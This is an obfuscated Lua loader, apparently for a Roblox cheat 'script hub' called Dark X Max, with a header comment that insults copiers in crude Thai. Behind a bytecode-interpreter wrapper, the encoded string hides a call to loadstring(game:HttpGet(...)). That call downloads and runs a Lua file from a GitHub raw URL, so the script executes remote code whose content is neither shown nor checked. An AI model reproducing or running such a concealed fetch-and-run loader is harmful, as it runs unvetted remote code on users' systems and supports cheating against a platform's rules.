--[[
         ____    _    ____  _  __    __  __     __  __    _    __  __
        |  _ \  / \  |  _ \| |/ /    \ \/ /    |  \/  |  / \   \ \/ /
        | | | |/ _ \ | |_) | ' /      \  /     | |\/| | / _ \   \  / 
        | |_| / ___ \|  _ <| . \      /  \     | |  | |/ ___ \  /  \ 
        |____/_/   \_\_| \_\_|\_\    /_/\_\    |_|  |_/_/   \_\/_/\_\
        \
         \__อีแก่มึงมาทำอะไรใน Script กูเหนี่ยไอสัตว์ มึงคัดลอกทั้งผมสิอีเหี้ย
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((879 -(282 + 595))^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=931 -(857 + 74) ;local v85;while true do if (v84==(568 -((2004 -(1523 + 114)) + 201))) then v85=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or 0 ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=(4641 -3575) -(68 + 997) ;end if (v34==(1271 -(226 + 1044))) then return v35;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(117 -(32 + 85))) then v37,v38=v1(v16,v18,v18 + 2 + (0 -0) );v18=v18 + 1 + 1 ;v36=958 -(892 + 65) ;end if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end end end local function v23() local v39=350 -(87 + 263) ;local v40;local v41;local v42;local v43;while true do if (((132 + 48) -(67 + 113))==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v39=2 -1 ;end if (v39==(1 + (0 -0))) then return (v43 * (66680831 -49903615)) + (v42 * (66488 -(802 + 150))) + (v41 * (689 -433)) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=1;local v47=(v20(v45,1,1017 -(915 + 82) ) * (2^32)) + v44 ;local v48=v20(v45,59 -38 ,19 + 12 );local v49=((v20(v45,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -(1486 -(998 + 488))) ;if (v48==(0 + 0)) then if (v47==(0 -0)) then return v49 * (0 + 0 + 0) ;else local v92=791 -(368 + 347 + 76) ;while true do if (v92==(0 -0)) then v48=19 -(10 + 8) ;v46=0 -0 ;break;end end end elseif (v48==((3261 -(201 + 571)) -(416 + 26))) then return ((v47==((1138 -(116 + 1022)) -0)) and (v49 * ((1 + 0)/(0 -(0 -0))))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((440 -(145 + 172 + 121))^(482 -(44 + 386))))) ;end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;local v52={};for v66=860 -(814 + 45) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1637 -(195 + 1442) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53==2) then for v93= #"[",v23() do local v94=(function() return v21();end)();if (v20(v94, #"!", #"[")==(0 -0)) then local v101=(function() return 0;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if ((2 + 0)==v101) then while true do if (v102~= #"91(") then else if (v20(v104, #"xxx", #"-19")~= #"\\") then else v105[ #"asd1"]=(function() return v59[v105[ #".dev"]];end)();end v54[v93]=(function() return v105;end)();break;end if (v102~= #",") then else local v140=(function() return 0 + 0 ;end)();local v141=(function() return;end)();while true do if (v140~=(396 -(115 + 281))) then else v141=(function() return 0 -0 ;end)();while true do if (v141~=(1 + 0)) then else v102=(function() return 4 -2 ;end)();break;end if (v141==0) then v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==(0 -0)) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if ((867 -(550 + 317))==v177) then v178=(function() return 0 -0 ;end)();while true do if (v178==(0 -0)) then v105[ #"gha"]=(function() return v22();end)();v105[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v103== #"!") then v105[ #"xnx"]=(function() return v23();end)();elseif (v103==2) then v105[ #"-19"]=(function() return v23() -(2^(44 -28)) ;end)();elseif (v103== #"asd") then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=(285 -(134 + 151))) then else v186=(function() return 1665 -(970 + 695) ;end)();while true do if (v186~=0) then else v105[ #"91("]=(function() return v23() -(2^(30 -14)) ;end)();v105[ #"?id="]=(function() return v22();end)();break;end end break;end end end v141=(function() return 1991 -(582 + 1408) ;end)();end end break;end end end if (v102==2) then local v142=(function() return 0;end)();local v143=(function() return;end)();while true do if (v142==(0 -0)) then v143=(function() return 0;end)();while true do if (v143~=1) then else v102=(function() return  #"19(";end)();break;end if (v143==(0 -0)) then if (v20(v104, #"[", #"{")== #"<") then v105[7 -5 ]=(function() return v59[v105[1826 -(1195 + 629) ]];end)();end if (v20(v104,2,2 -0 )~= #">") then else v105[ #"-19"]=(function() return v59[v105[ #"19("]];end)();end v143=(function() return 242 -(187 + 54) ;end)();end end break;end end end if (v102==(780 -(162 + 618))) then local v144=(function() return 0;end)();local v145=(function() return;end)();while true do if (v144~=0) then else v145=(function() return 0 + 0 ;end)();while true do if (v145==1) then v102=(function() return  #"\\";end)();break;end if (v145==0) then v103=(function() return v20(v94,2, #"-19");end)();v104=(function() return v20(v94, #"?id=",6);end)();v145=(function() return 1;end)();end end break;end end end end break;end if ((0 + 0)==v101) then local v127=(function() return 0 -0 ;end)();while true do if (v127==(1 -0)) then v101=(function() return 1 + 0 ;end)();break;end if (v127==0) then v102=(function() return 0;end)();v103=(function() return nil;end)();v127=(function() return 1637 -(1373 + 263) ;end)();end end end if (v101==1) then local v128=(function() return 0;end)();while true do if (v128~=(1000 -(451 + 549))) then else v104=(function() return nil;end)();v105=(function() return nil;end)();v128=(function() return 1 + 0 ;end)();end if (v128~=1) then else v101=(function() return 2;end)();break;end end end end end end for v95= #"{",v23() do v55[v95-#"]" ]=(function() return v28();end)();end return v57;end if (v53~= #",") then else local v89=(function() return 0 -0 ;end)();while true do if (v89~=(1 -0)) then else for v107= #">",v58 do local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==(1385 -(746 + 638))) then v111=(function() return nil;end)();while true do if (v109==0) then local v149=(function() return 0 + 0 ;end)();while true do if (0==v149) then v110=(function() return v21();end)();v111=(function() return nil;end)();v149=(function() return 1;end)();end if (v149==(1 -0)) then v109=(function() return  #"/";end)();break;end end end if (v109~= #"}") then else if (v110== #",") then v111=(function() return v21()~=(341 -(218 + 123)) ;end)();elseif (v110==2) then v111=(function() return v24();end)();elseif (v110~= #"gha") then else v111=(function() return v25();end)();end v59[v107]=(function() return v111;end)();break;end end break;end if (v108~=(1581 -(1535 + 46))) then else local v129=(function() return 0 + 0 ;end)();while true do if (v129==(1 + 0)) then v108=(function() return 561 -(306 + 254) ;end)();break;end if (v129==0) then v109=(function() return 0;end)();v110=(function() return nil;end)();v129=(function() return 1;end)();end end end end end v57[ #"-19"]=(function() return v21();end)();v89=(function() return 1 + 1 ;end)();end if (v89==(0 -0)) then v58=(function() return v23();end)();v59=(function() return {};end)();v89=(function() return 1;end)();end if (v89==2) then v53=(function() return 2;end)();break;end end end if (v53~=0) then else local v90=(function() return 1467 -(899 + 568) ;end)();while true do if (v90~=0) then else v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1 + 0 ;end)();end if ((4 -2)==v90) then v53=(function() return  #"|";end)();break;end if (v90==1) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 605 -(268 + 335) ;end)();end end end end end local function v29(v60,v61,v62) local v63=v60[291 -(60 + 230) ];local v64=v60[574 -(426 + 146) ];local v65=v60[1 + 2 + 0 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1457 -(282 + 1174) ;local v73= -(812 -(569 + 242));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v86=0 + 0 ,v76 do if ((3244>1055) and (v86>=v70)) then v74[v86-v70 ]=v75[v86 + (1025 -(706 + 318)) ];else v78[v86]=v75[v86 + (1252 -(721 + (1396 -866))) ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1272 -(945 + 326) ];if (v81<=(7 -4)) then if (v81<=(1 + 0)) then if (v81==0) then v78[v80[702 -(271 + 429) ]]=v80[3 + (0 -0) ];else v78[v80[1502 -(1408 + (1643 -(1126 + 425))) ]]={};end elseif ((v81>(1088 -(461 + 625))) or (3313<=1778)) then local v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + (1289 -(993 + 295)) ,v73));else do return;end end elseif ((v81<=(1 + 4)) or (1421>=2104)) then if (v81>((1580 -(118 + 287)) -(418 + (2951 -2198)))) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==(1 + 0)) then v73=(v120 + v118) -(1 + (1121 -(118 + 1003))) ;v121=0;v117=1 + (2 -1) ;end if (v117==0) then v118=v80[1 + 1 ];v119,v120=v71(v78[v118](v13(v78,v118 + (530 -(406 + 123)) ,v80[1772 -(1749 + 20) ])));v117=1 + 0 ;end if ((1812<=3249) and (v117==((1701 -(142 + 235)) -(1249 + 73)))) then for v146=v118,v73 do v121=v121 + 1 + (0 -0) ;v78[v146]=v119[v121];end break;end end else v78[v80[1147 -(466 + 679) ]]();end elseif ((1623<=1957) and (v81<=(14 -8))) then local v122=v80[5 -3 ];local v123=v78[v80[3]];v78[v122 + (1901 -(106 + 1794)) ]=v123;v78[v122]=v123[v80[4]];elseif ((4412==4412) and (v81==(3 + 4))) then v78[v80[1 + 1 ]]=v62[v80[8 -5 ]];else local v132=0 -0 ;local v133;local v134;local v135;local v136;local v137;while true do if (v132==(123 -(4 + 110))) then do return;end break;end if ((1750>=842) and (v132==7)) then v80=v68[v72];v137=v80[586 -(13 + 44 + 527) ];v78[v137]=v78[v137](v13(v78,v137 + (1428 -(41 + 1386)) ,v73));v72=v72 + (104 -(17 + 86)) ;v132=6 + 2 ;end if ((4372>1850) and (v132==(6 -3))) then v80=v68[v72];v137=v80[2];v136=v78[v80[3]];v78[v137 + (2 -1) ]=v136;v132=170 -(122 + 44) ;end if ((232<821) and (v132==2)) then v72=v72 + (978 -(553 + 424)) ;v80=v68[v72];v78[v80[2]]=v62[v80[5 -2 ]];v72=v72 + 1 ;v132=9 -(10 -4) ;end if (v132==5) then v72=v72 + 1 + 0 ;v80=v68[v72];v137=v80[1 + 1 ];v134,v135=v71(v78[v137](v13(v78,v137 + (1 -0) ,v80[3])));v132=(63 + 8) -(30 + 35) ;end if (v132==(6 + 2 + 0)) then v80=v68[v72];v78[v80[1259 -(608 + 435 + 214) ]]();v72=v72 + (3 -2) ;v80=v68[v72];v132=9;end if ((1212 -(138 + 185 + 889))==v132) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v132=2 -1 ;end if (v132==((332 + 249) -(361 + 219))) then v78[v80[(697 -375) -(53 + 267) ]]={};v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[(1156 -741) -((33 -18) + 398) ]]=v62[v80[3]];v132=984 -(18 + 964) ;end if (v132==(22 -16)) then v73=(v135 + v137) -(1 + 0) ;v133=0 + 0 ;for v174=v137,v73 do v133=v133 + (851 -(20 + 830)) ;v78[v174]=v134[v133];end v72=v72 + 1 + 0 ;v132=133 -(116 + 10) ;end if (v132==4) then v78[v137]=v136[v80[1 + 1 + 2 ]];v72=v72 + ((3571 -2832) -(542 + 196)) ;v80=v68[v72];v78[v80[2]]=v80[3];v132=10 -5 ;end end end v72=v72 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403723Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F757365722D6E616D653132332D706E672F4461726B2D582D4875622D62792D4461726B5F4D41582D47726F75702D2F726566732F68656164732F6D61696E2F2Q2D47554925323047726F75702E6C756100094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
